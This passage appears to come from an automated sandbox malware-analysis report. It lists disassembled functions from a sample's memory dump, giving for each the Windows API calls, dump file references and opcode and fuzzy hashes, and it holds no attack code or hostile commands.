                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 0021E9CD
                                                                                                                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0021E9EA
                                                                                                                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0021EA22
                                                                                                                                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0021EA48
                                                                                                                                                                  • _wcsstr.LIBCMT ref: 0021EA52
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3902887630-0
                                                                                                                                                                  • Opcode ID: bf671baa6822f5cbed3f9ba740f1f95cc7e94f1cdfc0d3aa9eb1381babc64ce6
                                                                                                                                                                  • Instruction ID: 2328223b04dc18486545fef91cd1f5dc35e79c47a2adcfedd92cd74d0c69163d
                                                                                                                                                                  • Opcode Fuzzy Hash: bf671baa6822f5cbed3f9ba740f1f95cc7e94f1cdfc0d3aa9eb1381babc64ce6
                                                                                                                                                                  • Instruction Fuzzy Hash: 1A212971614244BBEF159F29EC49EBBBBECDF55750F118029FC09CA191DAA1DCA08690
                                                                                                                                                                  Function 0024DC79 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 001FAF8E
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0024DCC0
                                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0024DCE4
                                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0024DCFC
                                                                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 0024DD24
                                                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,0023407D,00000000), ref: 0024DD42
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Long$MetricsSystem
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2294984445-0
                                                                                                                                                                  • Opcode ID: 81a12cd14f9d6fbd7001fbe39bdaad276077fe17d8b5e08dc1f01c925e296083
                                                                                                                                                                  • Instruction ID: 8d045ab095695e30728a248aec95fa4d569f303177586301d9a8dc022e5026bb
                                                                                                                                                                  • Opcode Fuzzy Hash: 81a12cd14f9d6fbd7001fbe39bdaad276077fe17d8b5e08dc1f01c925e296083
                                                                                                                                                                  • Instruction Fuzzy Hash: BE219272A24216EFCB285F79DC88B6637A4FB46375F114725F926C61E0D7B09830CB90
                                                                                                                                                                  Function 0021CA6D Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0021CA86
                                                                                                                                                                    • Part of subcall function 001E7E53: _memmove.LIBCMT ref: 001E7EB9
                                                                                                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0021CAB8
                                                                                                                                                                  • __itow.LIBCMT ref: 0021CAD0
                                                                                                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0021CAF6
                                                                                                                                                                  • __itow.LIBCMT ref: 0021CB07
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$__itow$_memmove
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2983881199-0
                                                                                                                                                                  • Opcode ID: d280eb6c31fcb3a435aea79f55d8a2a82cdac546bd4f3429c308d0eb8ef026ed
                                                                                                                                                                  • Instruction ID: a532a762a35d4f5ed555e639e923ab5495ca6b95c7d094c12a1d27b67d53ed78
                                                                                                                                                                  • Opcode Fuzzy Hash: d280eb6c31fcb3a435aea79f55d8a2a82cdac546bd4f3429c308d0eb8ef026ed
                                                                                                                                                                  • Instruction Fuzzy Hash: A421493A7502087BDB11EE659C4BEDF7BE8AF69704F205024F905E7182E6B08D9487A0
                                                                                                                                                                  Function 002389AD Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • IsWindow.USER32(00000000), ref: 002389CE
                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 002389E5
                                                                                                                                                                  • GetDC.USER32(00000000), ref: 00238A21
                                                                                                                                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 00238A2D
                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000003), ref: 00238A68
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4156661090-0
                                                                                                                                                                  • Opcode ID: 0565e72747db9ff3b8a47f8c0f683898442a603a9decda2eab9d08adb96ff46d
                                                                                                                                                                  • Instruction ID: a4f9f38dbadda55fb0c6cbc3825fc89f8129b718442f91d39c473343177df7af
                                                                                                                                                                  • Opcode Fuzzy Hash: 0565e72747db9ff3b8a47f8c0f683898442a603a9decda2eab9d08adb96ff46d
                                                                                                                                                                  • Instruction Fuzzy Hash: 17216275A00204AFDB00EFA5DD89AAABBF9EF48705F05C479E94A97351CB70AD01CB90
                                                                                                                                                                  Function 001FB58B Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 001FB5EB
                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 001FB5FA
                                                                                                                                                                  • BeginPath.GDI32(?), ref: 001FB611
                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 001FB63B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3225163088-0
                                                                                                                                                                  • Opcode ID: 598b1ced612ca8cca8a505b4b4f9bab86d134c63b7f3198636fd53844870322e
                                                                                                                                                                  • Instruction ID: f63eb5d51109a3cd6d7f9851db6fc95db0c7a2c5e5e8ef2df3b028b7ec5ded14
                                                                                                                                                                  • Opcode Fuzzy Hash: 598b1ced612ca8cca8a505b4b4f9bab86d134c63b7f3198636fd53844870322e
                                                                                                                                                                  • Instruction Fuzzy Hash: 2D217C70904349EFEB109F15FD8C7A97BE9FB12735F14811AF914921A0CBBC88A18F50
                                                                                                                                                                  Function 00202E57 Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • __calloc_crt.LIBCMT ref: 00202E81
                                                                                                                                                                  • CreateThread.KERNEL32(?,?,00202FB7,00000000,?,?), ref: 00202EC5
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00202ECF
                                                                                                                                                                  • _free.LIBCMT ref: 00202ED8
                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00202EE3
                                                                                                                                                                    • Part of subcall function 0020889E: __getptd_noexit.LIBCMT ref: 0020889E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2664167353-0
                                                                                                                                                                  • Opcode ID: ad2e5e7b851a3402117e95ab06fc92a68cf300a0983d56a12daf083b2e298a42
                                                                                                                                                                  • Instruction ID: 78c639b413ffb423022c22de754c4693bc70aba106add6fe8da869bb932d09b4
                                                                                                                                                                  • Opcode Fuzzy Hash: ad2e5e7b851a3402117e95ab06fc92a68cf300a0983d56a12daf083b2e298a42
                                                                                                                                                                  • Instruction Fuzzy Hash: B711083252430AEFDB11AF65DC49D6B7BA8EF44770710402AF954861D3DB71E8208B60
                                                                                                                                                                  Function 0021B8E7 Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0021B903
                                                                                                                                                                  • GetLastError.KERNEL32(?,0021B3CB,?,?,?), ref: 0021B90D
                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,0021B3CB,?,?,?), ref: 0021B91C
                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,0021B3CB), ref: 0021B923
                                                                                                                                                                  • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0021B93A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 883493501-0
                                                                                                                                                                  • Opcode ID: 79208a2cdb155bd3d015fcf78ce6d675e3cfe76c1c82aebe22683513afc0a72f
                                                                                                                                                                  • Instruction ID: 7b1da8e37c7c33f3a1f94d7559f7d14c0ae6cd60def2df68a8efe0f8de767f77
                                                                                                                                                                  • Opcode Fuzzy Hash: 79208a2cdb155bd3d015fcf78ce6d675e3cfe76c1c82aebe22683513afc0a72f
                                                                                                                                                                  • Instruction Fuzzy Hash: CD016D71611249BFDF114FA5EC8CDAB3BBDEF8A764B104069F545C2260DBB18C91DE60
                                                                                                                                                                  Function 00228355 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00228371
                                                                                                                                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0022837F
                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00228387
                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00228391
                                                                                                                                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 002283CD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2833360925-0
                                                                                                                                                                  • Opcode ID: 61dac0e545cc0b2a74c0ec41868629d03a79b6b002c2164520044c098863cea1
                                                                                                                                                                  • Instruction ID: 0b1d322c52e972a168e0bb65c729361eecc7a3cc44aaed20668b35ae2e4b0eae
                                                                                                                                                                  • Opcode Fuzzy Hash: 61dac0e545cc0b2a74c0ec41868629d03a79b6b002c2164520044c098863cea1
                                                                                                                                                                  • Instruction Fuzzy Hash: B6011731D1262EEBDF00EFE4FD4DAEEBB78BB09B01F044095E941B2150DBB095648BA1
                                                                                                                                                                  Function 0021A857 Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CLSIDFromProgID.COMBASE ref: 0021A874
                                                                                                                                                                  • ProgIDFromCLSID.COMBASE(?,00000000), ref: 0021A88F
                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,00000000), ref: 0021A89D
                                                                                                                                                                  • CoTaskMemFree.COMBASE(00000000), ref: 0021A8AD
                                                                                                                                                                  • CLSIDFromString.COMBASE(?,?), ref: 0021A8B9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3897988419-0
                                                                                                                                                                  • Opcode ID: b2b4210bcff43c9cc56189275cf16ea6858b45e27518c17d9cffe9ab50b54797
                                                                                                                                                                  • Instruction ID: 52b8eb4ba0c4d27d8308872393240d7cac4c359d3d96e5c684753412fc01b17e
                                                                                                                                                                  • Opcode Fuzzy Hash: b2b4210bcff43c9cc56189275cf16ea6858b45e27518c17d9cffe9ab50b54797
                                                                                                                                                                  • Instruction Fuzzy Hash: 01018F76A12209AFDB104F64EC88BDABBEDEF44351F118024F901D3210D7B0DD918BA1
                                                                                                                                                                  Function 0021B78E Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0021B7A5
                                                                                                                                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0021B7AF
                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0021B7BE
                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0021B7C5
                                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0021B7DB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 47921759-0
                                                                                                                                                                  • Opcode ID: 3602dc0fbb829786340386813c762101019ae65b87aeb188e6d9cac903b1b253
                                                                                                                                                                  • Instruction ID: a6f21f75bab4df243b451d46b4ea8dcf2bcda479c12d1183c4096376de34b914
                                                                                                                                                                  • Opcode Fuzzy Hash: 3602dc0fbb829786340386813c762101019ae65b87aeb188e6d9cac903b1b253
                                                                                                                                                                  • Instruction Fuzzy Hash: 1FF0AF3A6402096FEB110FA5AC8CEA77BBCFF86755F208019F904CB190DBA19C528A60
                                                                                                                                                                  Function 0021B7EF Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0021B806
                                                                                                                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0021B810
                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0021B81F
                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 0021B826
                                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0021B83C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 47921759-0
                                                                                                                                                                  • Opcode ID: 67d2f192d6e72a996f1aa19e6db87aaf163ab7d95a73db4c12834b5247dc7025
                                                                                                                                                                  • Instruction ID: 4d5b219a1ff8f16bed999cef311c828589c7885d124553ab38a9af01726ac567
                                                                                                                                                                  • Opcode Fuzzy Hash: 67d2f192d6e72a996f1aa19e6db87aaf163ab7d95a73db4c12834b5247dc7025
                                                                                                                                                                  • Instruction Fuzzy Hash: 19F04F75610209AFEB221FA5FC88FA73BBCFF46B54F104069F945C7150CBA19851CA60
                                                                                                                                                                  Function 0021FA7B Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0021FA8F
                                                                                                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 0021FAA6
                                                                                                                                                                  • MessageBeep.USER32(00000000), ref: 0021FABE
                                                                                                                                                                  • KillTimer.USER32(?,0000040A), ref: 0021FADA
                                                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 0021FAF4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
